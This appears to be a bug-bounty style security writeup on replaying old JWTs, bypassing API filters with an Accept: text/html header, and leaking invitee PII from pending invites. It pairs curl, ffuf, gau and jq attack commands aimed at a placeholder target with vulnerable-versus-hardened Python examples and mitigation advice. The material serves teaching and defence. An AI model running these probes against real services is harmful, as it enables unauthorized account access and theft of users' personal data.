Exploiting JWT and API Endpoints for Unauthorized Access

1. Reusing Old JWT Tokens for Unauthorized Access

Some applications issue a fresh JWT (JSON Web Token) for every session or request but never invalidate the tokens issued earlier. If the server checks only the signature and ignores `exp`, `jti` and any server-side revocation state, every token it ever signed stays valid. An attacker who captured an old token (proxy history, a log file, a shared machine) can then replay it and act as the original user without that user's involvement.

You Should Know:

  • Check JWT Validity (run with only the token to decode it and read exp/iat/jti; `-V` verifies the signature against the public key passed with `-pk`, for RS/ES tokens):
    jwt_tool <JWT_TOKEN>
    jwt_tool <JWT_TOKEN> -V -pk public.pem 
    
  • Exploit with cURL (replay a token issued earlier; a 200 carrying the user's data means neither expiry nor revocation is enforced):
    curl -i -H "Authorization: Bearer <OLD_JWT>" https://target.com/api/resource 
    
  • Decode JWT (header and payload are unpadded base64url, so map the URL-safe alphabet to standard base64 before `@base64d`):
    echo "<JWT_TOKEN>" | jq -R 'split(".") | .[0],.[1] | gsub("-";"+") | gsub("_";"/") | @base64d | fromjson' 
    
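The difference between a verifier that lets an old token through and one that does not, as an added example that is not code from the original post. It implements HS256 with the standard library only; the key, subject names, token ids and timestamps are constructed demo values. `verify_weak` is the vulnerable check (signature only), `StrictVerifier` pins the algorithm, enforces `exp` and tracks the current `jti` per subject so a superseded or logged-out token is refused.

```python
"""Replaying an old JWT: signature-only verification vs. exp + jti tracking.
Added example; the key and all tokens below are constructed, not real."""
import base64
import hashlib
import hmac
import json
from typing import Optional

DEMO_KEY = b"demo-hmac-key-not-a-real-secret"  # assumed key for this example


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    # JWT segments omit '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint(sub: str, jti: str, ttl: int, now: int, key: bytes = DEMO_KEY) -> str:
    """Issue an HS256 token with iat/exp and a unique token id (jti)."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": sub, "jti": jti, "iat": now, "exp": now + ttl}
    signing_input = ".".join(
        _b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def decode_unverified(token: str) -> tuple:
    """What the jq one-liner does: read the claims without trusting them."""
    h, p, _ = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p))


def _signature_ok(token: str, key: bytes) -> bool:
    h, p, s = token.split(".")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(s))


def verify_weak(token: str, key: bytes = DEMO_KEY) -> Optional[dict]:
    """VULNERABLE: checks only the signature. Every token ever issued stays
    valid forever, which is exactly why replaying an old JWT works."""
    try:
        if not _signature_ok(token, key):
            return None
        return decode_unverified(token)[1]
    except ValueError:  # malformed base64 / JSON / segment count
        return None


class StrictVerifier:
    """HARDENED: pins alg, enforces exp, and remembers which jti is current
    for each subject so a superseded or revoked token is rejected."""

    def __init__(self, key: bytes = DEMO_KEY, leeway: int = 0):
        self.key = key
        self.leeway = leeway
        self.current_jti = {}  # sub -> jti of the most recently issued token
        self.revoked = set()   # jti values explicitly invalidated

    def issue(self, sub: str, jti: str, ttl: int, now: int) -> str:
        previous = self.current_jti.get(sub)
        if previous is not None:
            self.revoked.add(previous)  # re-issuing retires the old token
        self.current_jti[sub] = jti
        return mint(sub, jti, ttl, now, self.key)

    def revoke(self, token: str) -> None:
        """Logout: remember the jti so the token cannot be replayed."""
        _, payload = decode_unverified(token)
        self.revoked.add(payload.get("jti"))

    def verify(self, token: str, now: int) -> Optional[dict]:
        try:
            header, payload = decode_unverified(token)
            if header.get("alg") != "HS256":   # no alg:none / key confusion
                return None
            if not _signature_ok(token, self.key):
                return None
        except ValueError:                     # malformed token
            return None
        if payload.get("exp", 0) + self.leeway <= now:
            return None                        # expired
        jti = payload.get("jti")
        if jti is None or jti in self.revoked:
            return None                        # revoked or untrackable
        if self.current_jti.get(payload.get("sub")) != jti:
            return None                        # superseded by a newer token
        return payload
```

Against `verify_weak` the first token a user ever received works indefinitely; against `StrictVerifier` it stops working the moment a newer one is issued, when it expires, or when it is explicitly revoked. The per-subject `current_jti` map stands in for whatever store (database row, cache entry) a real service would use.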

2. Bypassing API Restrictions via Header Manipulation

An endpoint such as `/api/v1/resources` may return only the caller's records when it serves JSON, but route a request carrying `Accept: text/html` through a different handler or template that was never given the same per-user filter. When that happens the HTML representation can expose every user's records. The root cause is authorization applied per representation instead of once, before content negotiation.

You Should Know:

  • Exploit with cURL (compare status, Content-Type and body size with the JSON response for the same account):
    curl -i -H "Accept: text/html" https://target.com/api/v1/resources 
    
  • Check for IDOR (Insecure Direct Object Reference), i.e. whether other users' object ids are served to your account:
    ffuf -u "https://target.com/api/v1/resources/FUZZ" -w wordlist.txt 
    
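How an `Accept: text/html` switch ends up leaking other users' rows, and the fix, as an added example that is not the original post's code. The resource table, user names and the simplified `Accept` parsing are constructed for illustration; no web framework is involved, the two handlers are plain functions so the ordering of authorization and negotiation is the only thing that differs.

```python
"""Authorization per representation (vulnerable) vs. once, before content
negotiation (fixed). Added example with constructed sample data."""
import json
from html import escape

# Constructed sample data: each record belongs to exactly one user.
RESOURCES = [
    {"id": 1, "owner": "alice", "secret": "alice-api-key"},
    {"id": 2, "owner": "bob", "secret": "bob-api-key"},
    {"id": 3, "owner": "alice", "secret": "alice-backup-key"},
]


def negotiate(accept: str) -> str:
    """Pick a representation from the Accept header (simplified: no q-values)."""
    return "html" if "text/html" in accept.lower() else "json"


def render(rows: list, fmt: str) -> str:
    if fmt == "json":
        return json.dumps(rows)
    cells = "".join(
        f"<tr><td>{r['id']}</td><td>{escape(r['owner'])}</td>"
        f"<td>{escape(r['secret'])}</td></tr>"
        for r in rows
    )
    return f"<table>{cells}</table>"


def handle_vulnerable(user: str, accept: str) -> str:
    """VULNERABLE: the JSON branch filters by owner; the HTML branch (added
    later, or generated by a framework) dumps the whole table."""
    if negotiate(accept) == "json":
        return render([r for r in RESOURCES if r["owner"] == user], "json")
    return render(RESOURCES, "html")


def handle_fixed(user: str, accept: str) -> str:
    """HARDENED: authorize first, then negotiate; every representation is
    rendered from the same filtered rows."""
    allowed = [r for r in RESOURCES if r["owner"] == user]
    return render(allowed, negotiate(accept))


def owners_in(body: str) -> set:
    """Whose secrets appear in a response body? (used to demonstrate the leak)"""
    return {r["owner"] for r in RESOURCES if r["secret"] in body}
```

The check a tester runs is the same as the one in the test: request the endpoint as one user with and without `Accept: text/html` and see whether a different owner's data shows up.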

3. Leaking PII via Unaccepted Invitations

Some applications create a user record the moment an invite is sent and serve it through the same API as accepted members. The invitee's email, UUID and full name then become readable to anyone who can list invites or members, before the invitee has accepted, or even seen, the invitation.

You Should Know:

  • Enumerate API Endpoints (`-E` so the `|` alternation is treated as a regex):
    gau target.com | grep -E "api|invite|user" 
    
  • Extract PII with jq:
    curl -s https://target.com/api/invites | jq '.users[] | .email, .name' 
    
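A serializer that withholds an invitee's profile until the invite is accepted, next to the one that leaks it, as an added example that is not the original post's code. The invite records, the `invited_by` field and the `invite_id` handle are constructed; a pending invite is visible only to the member who sent it, and only as an opaque handle plus the address they themselves typed.

```python
"""PII in unaccepted invites: uniform serialization (vulnerable) vs.
status- and requester-gated serialization (fixed). Added example with
constructed records."""
from typing import Optional

# Constructed sample data: one accepted member, one invitee who never responded.
INVITES = [
    {"invite_id": "inv-3", "uuid": "a1b2", "email": "dana@example.com",
     "name": "Dana Doe", "status": "accepted", "invited_by": "alice"},
    {"invite_id": "inv-7", "uuid": "c3d4", "email": "eli@example.com",
     "name": "Eli Example", "status": "pending", "invited_by": "alice"},
]

PII_FIELDS = ("email", "name", "uuid")


def serialize_vulnerable(invite: dict, requester: str) -> dict:
    """VULNERABLE: same shape regardless of status or requester, so listing
    invites reveals email, UUID and full name of people who never accepted."""
    return dict(invite)


def serialize_fixed(invite: dict, requester: str) -> Optional[dict]:
    """HARDENED: accepted members expose their public profile (no email);
    a pending invite is shown only to its sender, as an opaque handle plus the
    address the sender already knows; everyone else gets nothing."""
    if invite["status"] == "accepted":
        return {"uuid": invite["uuid"], "name": invite["name"], "status": "accepted"}
    if invite["invited_by"] != requester:
        return None
    return {"invite_id": invite["invite_id"], "status": invite["status"],
            "email": invite["email"]}


def list_invites(serializer, requester: str) -> list:
    """The /api/invites listing for `requester`, under the given serializer."""
    return [s for s in (serializer(i, requester) for i in INVITES) if s is not None]


def leaked_pii(rows: list) -> set:
    """Which PII fields of still-pending invitees appear in a response?"""
    pending = [i for i in INVITES if i["status"] != "accepted"]
    return {f for i in pending for f in PII_FIELDS
            for row in rows if i[f] in row.values()}
```

Run `leaked_pii(list_invites(serialize_vulnerable, "bob"))` for any member other than the sender to see the full leak; with `serialize_fixed` the same call returns nothing about pending invitees, and the sender sees only the email address they entered.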

What Undercode Say

  • JWT Security: Give every token a short `exp` and a unique `jti`, validate both on every request, keep server-side revocation state so superseded or logged-out tokens stop working, and reject unexpected `alg` values.
  • API Security: Apply authorization before content negotiation so every representation (JSON, HTML, CSV) is built from the same per-user filtered data; enforce object-level checks and role-based access control (RBAC) so changing an id or a header never widens access.
  • PII Exposure: Return only what is needed to manage a pending invite (an opaque handle and its status) and expose the invitee's profile only after they accept.

Expected Output:

[+] JWT reused successfully, unauthorized access granted. 
[+] API endpoint leaked all users' data via Accept: text/html. 
[+] PII leaked via unaccepted invites: email, UUID, full name. 

Prediction

API security flaws like these will lead to stricter OAuth 2.0 and JWT validation standards in 2024-2025. Bug bounty hunters will increasingly target misconfigured headers and weak invite mechanisms.

References:

Reported By: Abdelaziz Ahmed – Hackers Feeds